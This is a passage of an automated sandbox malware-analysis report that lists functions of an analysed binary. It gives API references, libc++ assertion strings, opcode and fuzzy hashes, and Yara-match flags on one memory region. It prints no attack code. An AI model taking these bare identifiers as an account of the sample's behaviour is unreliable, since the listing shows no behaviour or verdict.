                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\string:3605: assertion __n2 == 0 || __s != nullptr failed: string::compare(): received nullptr
                                                                                                                        • API String ID: 0-2865447378
                                                                                                                        • Opcode ID: 9d36fd8e36f200a0737ffa10afca0f292749d292aa6a8b711509a8e70db15b95
                                                                                                                        • Instruction ID: 362746e9a4f9e873714d255e5b399b3d13f953f54e5504abfac70d1a24b726cf
                                                                                                                        • Opcode Fuzzy Hash: 9d36fd8e36f200a0737ffa10afca0f292749d292aa6a8b711509a8e70db15b95
                                                                                                                        • Instruction Fuzzy Hash: 7522AE70E0061D9FCF15CFA8C4906AEBBB2FF45315F588119E815EB251EB31AD5ACB81
                                                                                                                        Function 008F08A0 Relevance: 2.8, Strings: 2, Instructions: 340COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Once$ExecuteInit
                                                                                                                        • String ID: dkT$dkT
                                                                                                                        • API String ID: 689400697-980905629
                                                                                                                        • Opcode ID: 557590f2505e4b0bcc2e4e10c96c04f0c65ded6a94870abad6614d5f08e8eca0
                                                                                                                        • Instruction ID: 572ad09ba693e4bf59b557782757f4565463f07959cfa6c6149f718bdad40aaa
                                                                                                                        • Opcode Fuzzy Hash: 557590f2505e4b0bcc2e4e10c96c04f0c65ded6a94870abad6614d5f08e8eca0
                                                                                                                        • Instruction Fuzzy Hash: FAC15F33F00B198F8B1CDA198A9616CAB6BA7C4700B57817FDD07EF161CAB1D905C5D1
                                                                                                                        Function 00850A00 Relevance: 2.7, Strings: 2, Instructions: 177COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __floor_pentium4
                                                                                                                        • String ID: VUUU$VUUU
                                                                                                                        • API String ID: 4168288129-3149182767
                                                                                                                        • Opcode ID: 40c714fb76464bae062011f5340520e655841e90be660978d8902a46daf8c6ea
                                                                                                                        • Instruction ID: f1a027fcdd0d6531ec1b31f559059e1274204a711beea7882c3d517c0879cf3f
                                                                                                                        • Opcode Fuzzy Hash: 40c714fb76464bae062011f5340520e655841e90be660978d8902a46daf8c6ea
                                                                                                                        • Instruction Fuzzy Hash: 205180729187009FC306DF38C955A1BFBEAEFD9784F04CB1DB88AA7251D730A8558B52
                                                                                                                        Function 00834B20 Relevance: 2.5, APIs: 2, Instructions: 12memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32 ref: 00834B27
                                                                                                                        • HeapAlloc.KERNEL32(00000000,00000000,?), ref: 00834B31
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$AllocProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1617791916-0
                                                                                                                        • Opcode ID: bf5f51028c1070f3f7077cc9ca13fafa2cda6b464b6fb32f15c4111e887a7053
                                                                                                                        • Instruction ID: b02f1fb1bab836b349b118e6ef760f53f82429d7cabec4a8c3549612bc533f1c
                                                                                                                        • Opcode Fuzzy Hash: bf5f51028c1070f3f7077cc9ca13fafa2cda6b464b6fb32f15c4111e887a7053
                                                                                                                        • Instruction Fuzzy Hash: E2C04C32555328B7CA103BA7EC0DBCA7F5CEB056A6F044051FA0997150CB6168009BE4
                                                                                                                        Function 008EE5D0 Relevance: 2.0, APIs: 1, Instructions: 468COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __floor_pentium4
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4168288129-0
                                                                                                                        • Opcode ID: 7d51092b3fb38a56b28d3b3cda4d76f23b0652e774e30859f083ffc3b692f30a
                                                                                                                        • Instruction ID: 944eceb4f856729eb1c8de27b23e42c8bead966e1111a9cc45cafa2a770c80a6
                                                                                                                        • Opcode Fuzzy Hash: 7d51092b3fb38a56b28d3b3cda4d76f23b0652e774e30859f083ffc3b692f30a
                                                                                                                        • Instruction Fuzzy Hash: 9F02B3715093599BC725EF25C891AAFB7E9FF99314F00091CF989D7241EB30AA05CBA3
                                                                                                                        Function 008626F0 Relevance: 1.9, Strings: 1, Instructions: 649COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string:3157: assertion __first <= __last failed: string::erase(first, last) called with invalid range, xrefs: 00862E08
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string:3157: assertion __first <= __last failed: string::erase(first, last) called with invalid range
                                                                                                                        • API String ID: 667068680-1702088555
                                                                                                                        • Opcode ID: b53a1a89b837635f3bdcf8095281f9b5db4d91d0a16e142937631c85e0a1b705
                                                                                                                        • Instruction ID: 0bcf60d925f6d31fdc49d83df686d3a4bece7262c9ec48d68a9a42784c0698d7
                                                                                                                        • Opcode Fuzzy Hash: b53a1a89b837635f3bdcf8095281f9b5db4d91d0a16e142937631c85e0a1b705
                                                                                                                        • Instruction Fuzzy Hash: 0532D275E006199FCB14DFA8D885AADB7B6FF88310F150169F906EB391EB70AD01CB91
                                                                                                                        Function 00878AD0 Relevance: 1.9, Strings: 1, Instructions: 621COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: __next_prime overflow
                                                                                                                        • API String ID: 0-822664188
                                                                                                                        • Opcode ID: 604f3fe8b80d2128a4f8f3b57e821136bbc6533d0121c1c9dddf65ddd75c5d97
                                                                                                                        • Instruction ID: b2b768336e11f4a60e06b2244d9073f752bd579c544ea8b667ec76a5179c8325
                                                                                                                        • Opcode Fuzzy Hash: 604f3fe8b80d2128a4f8f3b57e821136bbc6533d0121c1c9dddf65ddd75c5d97
                                                                                                                        • Instruction Fuzzy Hash: D712AE72B80125CBCB5CC928CCD956EB293FB94324B18C47ADC1EEB245DB34ED1D8665
                                                                                                                        Function 0594469A Relevance: 1.8, Strings: 1, Instructions: 596COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 0-3916222277
                                                                                                                        • Opcode ID: 305e869ac04186f69d5be6eabac3b42e683359892f6d59ba473beeecc2e1308b
                                                                                                                        • Instruction ID: b6239024fa1e157e563bcf41d4f4fb3cade2f2a5c4b66128a7ff6af1348339ce
                                                                                                                        • Opcode Fuzzy Hash: 305e869ac04186f69d5be6eabac3b42e683359892f6d59ba473beeecc2e1308b
                                                                                                                        • Instruction Fuzzy Hash: CB429D31A04A56AFCB19CF69C480BA9FBF2FF48314F188169D499E7751D734A8A1CF80
                                                                                                                        Function 008825C0 Relevance: 1.8, Strings: 1, Instructions: 572COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • 0123456789abcdefABCDEFxX+-pPiInN, xrefs: 008826BB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0123456789abcdefABCDEFxX+-pPiInN
                                                                                                                        • API String ID: 0-2175827864
                                                                                                                        • Opcode ID: a6690ba84787d5acd5fd90e9a774747d9601a3afcf4e618265482a9cd8a69d5a
                                                                                                                        • Instruction ID: 0af0ebae4d17555807c509f9d8c02aefdc6ee3f74f457b4ca40e78214217a3a2
                                                                                                                        • Opcode Fuzzy Hash: a6690ba84787d5acd5fd90e9a774747d9601a3afcf4e618265482a9cd8a69d5a
                                                                                                                        • Instruction Fuzzy Hash: 5D226A71E002299BCF14EFA8C884AEDBBB1FF49324F194259E855BB381D774AD45CB90
                                                                                                                        Function 0087E8A0 Relevance: 1.8, Strings: 1, Instructions: 560COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • 0123456789abcdefABCDEFxX+-pPiInN, xrefs: 0087E973
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0123456789abcdefABCDEFxX+-pPiInN
                                                                                                                        • API String ID: 0-2175827864
                                                                                                                        • Opcode ID: 48ee3430fd1d65854926f4b981a8d8acf48390eb38f178f5e7e4eebfb5620cc7
                                                                                                                        • Instruction ID: 12cfd95df354f2af8004504ac982920b9fb4c03a4e31d9e7c09a0ffd3720d6c3
                                                                                                                        • Opcode Fuzzy Hash: 48ee3430fd1d65854926f4b981a8d8acf48390eb38f178f5e7e4eebfb5620cc7
                                                                                                                        • Instruction Fuzzy Hash: AC228F71E042298BCF15CFA8C8806EDBBB1FF49324F158699E859BB385D774AD05CB90
                                                                                                                        Function 0087C0C0 Relevance: 1.8, Strings: 1, Instructions: 554COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0123456789abcdefABCDEFxX+-pPiInN
                                                                                                                        • API String ID: 0-2175827864
                                                                                                                        • Opcode ID: f4b8bdd8457bcfc4c45227cd8e011dcb7c307821fe9b7f9ba872adc4a704712f
                                                                                                                        • Instruction ID: 6c4d01d3e9fb4bfb16a7d25e448e9cb61202e7b6f936b5f8bacfe1470d1aea79
                                                                                                                        • Opcode Fuzzy Hash: f4b8bdd8457bcfc4c45227cd8e011dcb7c307821fe9b7f9ba872adc4a704712f
                                                                                                                        • Instruction Fuzzy Hash: 2422AE70A002598FCF14CF98C8906ADBBB2FF49314F28826DE859EB385D775AD45CB90
                                                                                                                        Function 0087C790 Relevance: 1.8, Strings: 1, Instructions: 553COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0123456789abcdefABCDEFxX+-pPiInN
                                                                                                                        • API String ID: 0-2175827864
                                                                                                                        • Opcode ID: 2578e232ff7f59313892379f6f1eb9f706010ee5c1e5944bc3f6cd2116cd0f5e
                                                                                                                        • Instruction ID: d87428fff67468a1020d09ff90253fc7fcdb7310193bf52cdf629ead337d520b
                                                                                                                        • Opcode Fuzzy Hash: 2578e232ff7f59313892379f6f1eb9f706010ee5c1e5944bc3f6cd2116cd0f5e
                                                                                                                        • Instruction Fuzzy Hash: 41228D71A002598FCF15CF98C8906ADBBB2FF89314F28826DE859EB385D734AD45DB50
                                                                                                                        Function 0087CE60 Relevance: 1.8, Strings: 1, Instructions: 553COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0123456789abcdefABCDEFxX+-pPiInN
                                                                                                                        • API String ID: 0-2175827864
                                                                                                                        • Opcode ID: c1f97163e0947d2ec761e9db0faf58e5b41b6f8a578aef7a398aa841aa1016d8
                                                                                                                        • Instruction ID: f3d36a5d20e72c3a395edea7ff456c4f58bc55342cf7f7024ff42021cf0d7244
                                                                                                                        • Opcode Fuzzy Hash: c1f97163e0947d2ec761e9db0faf58e5b41b6f8a578aef7a398aa841aa1016d8
                                                                                                                        • Instruction Fuzzy Hash: DC228E71A003598FCF14CF98C890AADBBB2FF49314F288259E859EB385D775AD46CB50
                                                                                                                        Function 00928E62 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00928DBD,?,?,00000008,?,?,0092C643,00000000), ref: 0092908F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionRaise
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3997070919-0
                                                                                                                        • Opcode ID: 0537da7340c3d81d78977cfec4d4ad69565b4b78e70c4ecea545dc52b3f48d42
                                                                                                                        • Instruction ID: 1fea9d6ec91f78e7a984d731c41c4b7da51593649852efea44223d2999e3c8b0
                                                                                                                        • Opcode Fuzzy Hash: 0537da7340c3d81d78977cfec4d4ad69565b4b78e70c4ecea545dc52b3f48d42
                                                                                                                        • Instruction Fuzzy Hash: FAB1AE31210619DFD714CF28D48ABA57BE1FF05324F298658E89ACF2E6C735E992CB40
                                                                                                                        Function 05940000 Relevance: 1.7, Strings: 1, Instructions: 488COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Y`l=
                                                                                                                        • API String ID: 0-1320565934
                                                                                                                        • Opcode ID: edf368804a618f218c17f208d3900245e3cb5d171d7fb9e5d82929b710462c2d
                                                                                                                        • Instruction ID: d957ccedd22c2e0bfa0f19c925bed4ccfe34f316631a6388b06b2f7e22f4debd
                                                                                                                        • Opcode Fuzzy Hash: edf368804a618f218c17f208d3900245e3cb5d171d7fb9e5d82929b710462c2d
                                                                                                                        • Instruction Fuzzy Hash: FDE134BBD553394BDB24CE79DC483AEA562B7C0304F869328D817EF248DB3549868BC1
                                                                                                                        Function 00900456 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0090046C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FeaturePresentProcessor
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2325560087-0
